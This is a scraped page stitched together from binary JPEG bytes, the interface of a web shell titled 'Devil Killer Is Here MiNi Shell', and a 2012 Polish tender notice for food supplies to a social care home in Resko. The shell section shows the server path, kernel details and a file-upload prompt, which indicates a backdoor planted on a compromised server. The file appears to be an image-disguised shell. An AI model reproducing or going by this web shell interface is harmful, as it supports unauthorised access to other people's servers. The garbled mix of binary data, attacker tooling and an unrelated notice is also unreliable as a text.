JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/460284-N-2012.html

<p class="kh_header"><b>Resko: Sukcesywne dostawy artykułów spożywczych dla DPS w Resku w roku 2013</b><br>
<b>Numer ogłoszenia: 460284 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Wojska Polskiego 40, 72-315 Resko, woj. zachodniopomorskie, tel. 091 3951830, faks 091 3951337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dps.resko.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna pozostała z zakwaterowaniem.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych dla DPS w Resku w roku 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy artykułów spożywczych dla DPS w Resku w roku 2013
w częściach: 	
część 1. Warzywa i owoce - kod  CPV 031 00000-2
część 2. Jaja świeże -  kod  CPV 031 42500-3
część 3. Produkty zwierzęce, mięso i produkty mięsne  -  kod  CPV 151 00000-9
część 4. Konserwy i przetwory z mięsa  -  kod  CPV 151 31000-5
część 5. Ziemniaki -  kod  CPV 032 10000-6
część 6. Ryby przetworzone i konserwowe oraz warzywa i owoce mrożone -  kod  CPV 150 000000-8
część 7. Przetworzone owoce i warzywa -  kod  CPV 153 30000-0
część 8. Produkty mleczarskie -  kod  CPV 155 00000-3
część 9. Produkty przemiału ziarna -  kod  CPV 156 00000-4
część 10. Pieczywo, świeże wyroby piekarskie i ciastkarskie -  kod  CPV 158 10000-9
część 11. Różne produkty spożywcze -  kod  CPV 158 00000-6.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych i spełniający wymogi art. 22 ust. 1, tj. Wykonawcy, którzy spełniają poniższe warunki : 
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - na podstawie dokumentów wymienionych w punkcie 7 WYKAZU WYMAGANYCH DOKUMENTÓW   - ( pkt. 7.2. SIWZ).  Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.
 - posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym zgodnym z wymogami HACCP i osobami zdolnymi do wykonania zamówienia; 
 - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oferta - wypełniony formularz ofertowy  (zał. 1) wraz z załącznikami nr 1/1 do 1/11 UWAGA! - Formularz/e należy wypełnić zgodnie z rubrykami i składać jako załącznik do oferty
- Wzór umowy należy złożyć jako załącznik do OFERTY (zał.2)  
- Oświadczenie wynikające z art.22 i 24 ustawy Prawo Zamówień Publicznych. Oświadczenie to należy składać jako załącznik do OFERTY wg wzoru    przekazanego przez Zamawiającego   (zał.3)
- Pełnomocnictwo do podpisania oferty i zawartych w niej dokumentów, jeżeli oferta i dokumenty nie zostały podpisane przez osoby upoważnione do podejmowania zobowiązań w imieniu Wykonawcy zgodnie z wpisem o reprezentacji w stosownym dokumencie uprawniającym do występowania w obrocie prawnym.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dps.resko.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej ul. Wojska Polskiego 40 72-315 Resko I piętro budynku administracji - pokój kadr.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2012 godzina 10:00, miejsce: Dom Pomocy Społecznej ul. Wojska Polskiego 40 72-315 Resko I piętro budynku administracji - pokój kadr.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz	kg	700
Banan	kg	1250
Botwinka świeża pęczek	kg	50
Brzoskiwinia świeża	kg	150
Burak czerwony 	kg	1600
Cebula 	kg	700
Cytryna 	kg	160
Grejfrut	kg	150
Jabłka	kg	2900
Kalafior świeży	szt	550
Kapusta biała 	kg	1500
Kapusta czerwona	kg	450
Kiwi	kg	500
Koper zielony świeży - pęczek	kg	55
Mandarynka 	kg	500
Marchew  świeża	kg	2900
Nektaryna	kg	250
Ogórek świeży 	kg	940
Papryka świeża	kg	260
Pieczarka świeża	kg	280
Pietruszka korzeń kg	490
Pietruszka natka - pęczek	kg	50
Pomarańcze	kg	350
Pomidor 	kg	1025
Por 	kg	500
Rzodkiewka - pęczek	szt	240
Sałata lodowa	szt	400
Sałata zielona	szt	400
Seler korzeń	kg	550
Szczypior z cebulą - pęczek	szt	280
Truskawki świeże	kg	250
Winogron	kg	240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.10.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Jaja świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jaj świeżych  KL.B 2 M 53-63 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mięsa i produktów mięsnych:
Ćwiartka z kurcząt wędzona (pałka+udziec+część korpusu)	kg	70
Filet z piersi kurczaka - element  tuszki kurczęcej obejmujący mięsień piersiowo powierzchniowy, bez przylegającej skóry oraz części chrzęsno-kostnych	kg	380
Korpusy drobiowe świeże 	kg	200
Kości spożywcze wieprzowe świeże powstałe w wyniku oddzielenia ręcznego lub mechanicznego od mięsa, z pozostałościami tkanki mięsnej  ( kości schabowe, od karkówki, biodrówki, żeberkowe)	kg	900
Łopatka wieprzowa świeża  z kością bez skóry	kg	1800
Schab  wieprzowy z kością,
słonina ze schabu całkowicie zdjęta	kg	400
Słonina świeża bez skóry	kg	1350
Szynka świeża wieprzowa, bez kości,bez skóry, bez tłuszczu	kg	200
Udko z kurczaka  świeże (pałka+udziec) element tuszki kurczęcej obejmujący kości - udową, piszczelową i strzałkową, łącznie z otaczającymi je mięśniami. Uda właściwie umięśnione, nie dopuszcza się wylewów krwawych w mięśniach.	kg	1820
Mięso mielone wieprzowe świeże grubo rozdrobnione, schłodzone, nie mrożone, maksymalna zawartość tłuszczu 30%. Mięso czyste, bez śladów jakichkolwiek zanieczyszczeń o barwie od jasnoróżowej do czerwonej, dopuszczalne zmatowienie, niedopuszczalny odcień szary lub zielonkawy, konsystencja jędrna i elastyczna, zapach swoisty, charakterystyczny dla mięsa świeżego, bez oznak zaparzenia i rozpoczynającego się psucia; niedopuszczalny zapach świadczący o nieświeżości lub inny obcy	kg	900
Wątróbka drobiowa uzyskana z tuszki kurczęcej w postaci podwójnych  lub pojedynczych płatów, pozbawiona części  niejadalnych- bez woreczka żółciowego  i zanieczyszczeń, barwa beżowa do brunatno-wiśniowej charakterystyczna dla wątroby świeżej	kg	260.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konserwy i przetwory z mięsa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa konserw i przetworów z mięsa:
Baton szynkowy drobiowy kg	225
Pasztet mięsny	    kg	150
Kaszanka z kaszą jęczmienną perłową	kg	660
Kiełbasa szynkowa wieprzowa	kg	225
Kiełbasa biała wieprzowa surowa	kg	150
Konserwa turystyczna 290-300 g	szt	200
Szynka drobiowa	kg	225
Kiełbasa krakowska parzona lub równoważna	kg	225
Kiełbasa podwawelska	kg	225
Kiełbasa toruńska	kg	1000
Parówki drobiowe	kg	360
Pasztet drobiowy  w puszce 150-160 g	szt	600
Pasztetowa drobiowa luksusowa	kg	340
Polędica drobiowa  	kg	225
Szynka konserwowa	kg	225
Polędwica z indyka	kg	225
Baleron wieprzowty gotowany	kg	260
Mielonka wieprzowa w konserwie - w galarecie	kg	225
Salceson ozorkowy 	kg	300
Szynka  wieprz.wędz. parzona 	kg	30
Szynka tostowa	kg	30
Ogonówka wędzona parzona	kg	225.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa ziemniaków jadalnych  Wineta lub równoważne pakowane  w worki siatkowane po 30 kg. Każda dostarczona partia oznaczona datą pakowania. kg	30000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby przetworzone i konserwowe oraz warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostaw ryb przetworzonych, mrożonych  i konserwowanych  oraz warzyw i owoców mrożonych:
Brokuły mrożone  	kg	210
Filety rybne z morszczuka  mrożone bez glazury, bez ości, bez skóry	kg	800
Kalafior mrożony  	kg	160
Makrela wędzona	kg	140
Płaty śledziowe Matjas	kg	170
Szpinak mrożony 490-500 g	szt	50
Truskawka mrożona 	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przetworzone owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców i warzyw przetworzonych:
Ananasy w syropie 565-600 g	szt	280
Brzoskwinie w syropie 800-820g	szt	250
Chrzan  0,9-1 kg	szt	50
Ćwikła 400-420 g	szt	100
Dżem 0,9-3 kg wieloowocowy wysokosłodzony	kg	1700
Fasola sucha Jaś 380-400g	szt	700
Fasolka szparagowa konserwowa 2,55-2,6 kg	szt	580
Galaretki owocowe 80-100g	szt	1300
Groch łuskany 490-500g	szt	360
Groszek konserwowy 2,55-2,6 kg	szt	186
Kapusta kiszona 	kg	1200
Keczup 950-1000 g	szt	100
Kompot truskawkowy 0,9 l	szt	650
Kompot wiśniowy 0,9 l	szt	210
Kompot z aronii 0,9 l	szt	550
Koncentrat pomidrowy 30% 850-900 g
 Złoty Bażant lub równoważny	szt	340
Kukurydza konserwowa 350-400 g	szt	200
Musztarda 0,9-1 kg	szt	160
Ocet spirytusowy 10% 480-500 ml	szt	60
Ogórek konserwowy  0,9-1 l	szt	1650
Ogórek kiszony 0,9-1 l	szt	50
Olej roślinny do samżenia  4,5-5 l	litr	112
Papryka konserwowa 0,9-1 l	szt	410
Przecier ogórkowy 0,9-1 l	szt	180
Sok wielowarzywny bez cukru 1,5-2 l	szt	160
Sok pomidorowy bez cukry 1,5-2 l	szt	50
Śledź w sosie pomidorowym 160-170 g	szt	400
Śledź w oleju 160-170 g	szt	400
Szczaw konserwowy 900-950 g	szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa produktów mleczarskich:
Jogurt naturalny bez cukru 120-130 g	szt	660
Jogurt owocowy 90-100 g	szt	5200
Margaryna  250g  Palma lub równoważna	kg	80
Margaryna miękka 20% tł. 1 kg	szt	920
Masło  ekstra 82% - 200g	kg	1350
Maślanka 1 l	litr	500
Mleko półtłuste 2% folia 	litr	18700
Ser Feta naturalny  260-270 g żółty 3% tł. szt	145
Ser żółty salami lub równoważny	kg	520
Serek topiony - zegar (trójkąciki) - 8 szt. w op.	op	1270
Śmietana 18% 400 ml	szt	2760
Twaróg półtłusty kostka	kg	870.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Produkty przemiały ziarna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa produktów przemiału ziarna:
Kaszka błyskawiczna mleczno-ryżowa owocowa  480-500 g	szt	30
Kasza jęczmienna  0,9-1 kg	kg	440
Kasza kukurydziana 0,9-1 kg	kg	40
Kasza manna 0,9-1 kg	kg	95
Kasza pęczak 0,9-1 kg	kg	45
Mąka pszenna  0,9-1 kg	kg	1900
Mąka ziemniaczana  0,9-1 kg	kg	44
Płatki kukurydziane 0,9-1 kg	kg	145
Płatki owsiane 0,9-1 kg	kg	190
Ryż biały długoziarnisty 0,9-1kg	kg	540.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pieczywo. świeże wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieczywa, świeżych wyrobów piekarskich  i ciastkarskich:
Bułka montowa 48-50 g	szt	32000
Bułka grahamka 48-50 g	szt	10000
Bułka tarta 0,95-1 kg	kg	270
Chleb dyniowy kroj.400-420g	szt	1200
Chleb graham kroj.400-420g	szt	950
Chleb słonecz.kroj.400-420g	szt	1300
Chleb szczecińs. kroj.0,6-0,7 kg	szt	15000
Chleb wieloziar. kroj. 400-420 g	szt	1900
Ciasto miodownik	kg	15
Ciasto babka wielkanocna	kg	20
Ciasto metrowiec	kg	15
Ciasto makowiec	kg	30
Ciasto mazurek wielkanocny	kg	15
Ciasto sernik	kg	45
Ciasto szarlotka	kg	15
Cisto jogurtowe	kg	30
Cisto keks	kg	30
Drożdże piekarskie prasowane 	kg	11
Pączki 90-100 g	szt	300
Rogal wyborowy 95-100g	szt	4000
Suchary dietetyczne kg	kg	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa różnych produktów spożywczych:
Aromaty -fiolki 10 ml	szt	40
Budyń śmietankowy w proszku 40-50 g	szt	1200
Bulion rosołowy uniwersalny  w proszku 	kg	110
Bazylia suszona 20-25 g	szt	80
Cukier biały kryształ kg	szt	2950
cukier puder 490-500 g	szt	24
Cukier wanilinowy 32-35g	szt	590
Cukierki czekoladowe kg	kg	30
Cynamon 18-20 g	szt	140
Czekolada 95-100 g mleczna	szt	300
Czosnek granulowany 490-500 g	szt	26
Estragon  18-20g	szt	50
Herbata indyjska granul.90-100 g	szt	800
Herbata owocowa 90-100 g (nie napój herbaciany rozpuszczalny)	szt	760
Kakao 90-100g	szt	360
Kawa Inka 150 g lub równoważna szt	900
Kisiel 40-50g	szt	1600
Kminek 18-20 g	szt	100
Koper zielony susz 240-250 g	kg	16
Kwasek cytrynowy 20-25g	szt	350
Liść laurowy 200-210g	szt	18
Majeranek  95-100g	szt	30
Majonez 590-600 g	szt	440
Makaron 490-500g Lubella lub równoważny szt	1300
Makaron spaghetti 480-500 g Lubella lub równoważny	szt	250
Masa makowa z bakaliami 900-950g 	szt	30
Oregano suszone 20-25 g	szt	80
Papryka słodka mielona 480-500 g	szt	15
Paprykarz szczeciński 290-300 g	szt	0
Pieprz czarny naturalny 490-500g	szt	45
Pietruszka zielona susz 240-250 g	szt	16
Przypr. złocista do kurczaka 40-50 g	szt	150
Przyprawa Warzywko 0,95-1kg lub równoważna	szt	210
Przyprawa do ziemniaków 0,95-1 kg	szt	10
Przyprawa Gyros 490-500 g	szt	10
Sos pomidorowy w proszku 40-50 g	szt	50
Sos pieczarkowy w proszku 40-50 g	szt	50
Sos Winiary do spaghetti 950-1000 g lub równoważny	szt	12
Sól spożywcza kg	kg	700
Syrop owocowy na słodziku dla diabetyków 330-350 ml	szt	130
Syrop owocowy wysoko słodzony  6-6,50 kg	szt	70
Tymianek  suszony18-20 g	szt	80
Ziele angielskie  490-500g	szt	13
Zioła prowansalskie suszone 40-50g	szt	130
Zupa w pr. barszcz czer. Winiary  50-55 g lub równoważny	szt	350
Zupa w proszku barszcz biały Winiary 50-55 g lub równoważny	szt	280
Zupa w proszku Żurek Winiary 50-55 g lub równoważna	szt	150
Żelatyna spożywcza 450-500g	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
